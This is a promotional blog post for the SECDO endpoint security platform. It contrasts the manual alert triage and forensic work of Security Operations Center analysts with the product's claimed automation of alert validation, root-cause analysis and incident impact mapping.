A Day in the Life of the SOC…. Then and Now
Once upon a time, life in the Security Operations Center was hard. Fortunately, times have changed.
Not so long ago, analysts spent long hours every day pouring over hundreds of alerts, trying to decide which ones were serious, and which ones were false positive. They manually collected endpoint and server data to see the full context of the alert, and created dozens of complex queries to find the information they needed in the sea of events. The most skilled hunters and investigators then worked long and hard to figure out what it all meant, to identify the root cause, prepare a detailed forensic analysis of the impact, and put it right. And all of this had to be done over, and over, and over again. The headache was exponentially larger for MSSPs and other service providers with multiple customers and tough SLAs for response time.
Before we started SECDO, we took a good look at life in the SOC and came up with our own list of reasons why hunting and investigating threats is taking so long:
- There’s no simple way to validate alerts
- There is not nearly enough endpoint and server visibility to validate alerts or investigate incidents
- There is no easy way to search and analyze information once you collect it
- Analytics tools, when available, are not designed to identify root cause, and the cause and effect chain of an attack. You have to figure it out yourself.
- There is no automated solution that maps the impact of an incident and helps you to clean it up
We knew that if we checked off every item on this list, we could really make a difference in the daily life a security analyst. And, a year later…
The SECDO platform is disrupting a day in the life of the SOC. SECDO continuously collects the most detailed, thread-level endpoint activity and correlates it with third-party alerts via the SIEM. With a revolutionary Causality Analytics technology, SECDO not only identifies suspicious behaviors – it shows you the forensic timeline for every behavior from the root cause onward.
SECDO’s unique, narrative approach to hunting and investigation visualizes the cause and effect between every event and alert in the organization. It instantly reveals the full story behind any alert or suspicious event – the “who, what, where, when, how and why.”
With automatic Alert Validation, SECDO saves countless hours by flagging every false positive and letting you drill down on the genuine alerts with a single click. SECDO’s visual search engine replaces hundreds or even thousands of textual queries with a simple, drag and drop interface. Last but not least, the SECDO platform reveals the impact of any incident, across all of the endpoints and servers involved, so you can quickly perform forensic analysis, report fully, and remediate fast.